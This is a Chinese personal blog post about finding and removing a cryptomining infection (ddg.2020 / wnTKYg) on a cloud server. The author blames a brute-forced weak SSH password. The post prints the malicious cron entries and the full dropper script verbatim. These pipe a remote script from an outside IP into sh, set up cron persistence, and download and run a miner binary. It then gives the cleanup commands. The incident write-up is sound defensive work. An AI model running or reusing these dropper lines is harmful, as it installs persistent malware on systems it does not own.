当前位置:8090社团 >监控安全 > 查看文章
阿里云优惠码

今天早晨吧,收到阿里云的报警短信,说我的服务器被成功入侵,入侵者 IP47.92.147.75,查了下 IP 信息,也是北京的,而且还是阿里云的,呵呵,收到短信是四点多,八点多起床才看到,咦,好吓人,起床洗洗就出门了,赶紧到到公司看看这是神马情况,有点忐忑。。

到了公司以后先是查了一下这个服务器的信息,跑的是什么,还好,服务器的配置为一核 2G,跑的是一个生成二维码的小项目,松了一口气,访问了一下,阔以正常访问到,没有收到影响,还好,然后连上服务器,top 看了一下,和以前的被入侵的症状一样,木马程序把 CPU 跑满。

检索了一下这个进程,是放在 / tmp 目录的,然而在我刚连上服务器的时候,执行完某一条命令,出现提示 you have new mail in /var/spool/mail/root,很明显这是计划任务的执行信息,没有追加到 / dev/null,计划任务执行的提醒就会以邮件的形式发给你,写到 root 的 mail 文件。习看了一下 root 的 mail 文件,发现了点东西,我就把重点的贴出来了,

然后看了一眼计划任务,看到下面的东西,每隔五分钟,以 curl 和 wget 的方式去执行一个名称为 i.sh 的脚本,并没有下载到服务器。

[root@iZ2zebpmjvj4vk54b8yqvvZ ~]# crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

 

我很好奇的看了一下这个脚本的内容,如下,很简单,相信大家都能看懂。

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.2020" ]; then
    curl -fsSL http://218.248.40.228:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020
fi

if [ ! -f "/tmp/ddg.2020" ]; then
    wget -q http://218.248.40.228:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020
fi

chmod +x /tmp/ddg.2020 && /tmp/ddg.2020


ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

 

既然知道这个它的执行顺序了,那就一步一步的给他清了,先把计划任务删掉。

既然知道这个它的执行顺序了,那就一步一步的给他清了,先把计划任务删掉。

[root@iZ2zebpmjvj4vk54b8yqvvZ ~]# crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
[root@iZ2zebpmjvj4vk54b8yqvvZ ~]# > /var/spool/cron/root
[root@iZ2zebpmjvj4vk54b8yqvvZ ~]# crontab -l
[root@iZ2zebpmjvj4vk54b8yqvvZ ~]# > /var/spool/cron/crontabs/root
杀掉 ddg.2020&wnTKYg 进程,并删除,一切恢复正常。

[root@iZ2zebpmjvj4vk54b8yqvvZ ~]# ps aux | grep -E "ddg.2020|wnTKYg" | awk {'print $2'} | grep -v grep | xargs kill -9
[root@iZ2zebpmjvj4vk54b8yqvvZ ~]# rm -rf /tmp/ddg.2020 /tmp/wnTKYg /tmp/Aegis-\<Guid\(5A2C30A2-A87D-490A-9281-6765EDAD7CBA\)\>

至于最后三个 kill 是在杀什么我没看懂,不管了,还有就是我服务器是如何被入侵的,因为我没装 redis,如果装了我也会有相关的策略去控制,所以通过秘钥被入侵的可能性为 0,我看了一下,只有一个,是我 ansible 服务器的秘钥。 然后去检索登陆 log,受到了惊吓,密码居然被成功破解了,说实话,我自己都忘了这服务器密码是啥子了,下面是 log,从 3:45 开始试密码,到最后 4:14 成功入侵,特么的,准备改密码,翻了一下记密码的文档,现在用的密码居然只有 8 位数,组合也很简单,怪自己二逼咯,然后换了个复杂的,这次应该没什么问题了,有问题再说吧。

 


本文链接:https://www.8090st.com/linux-wntkyg.html 转载请注明出处.
如果喜欢:点此订阅本站
相关文章
为您推荐
各种观点
暂时还木有人评论,坐等沙发!
发表评论

快捷键:Ctrl+Enter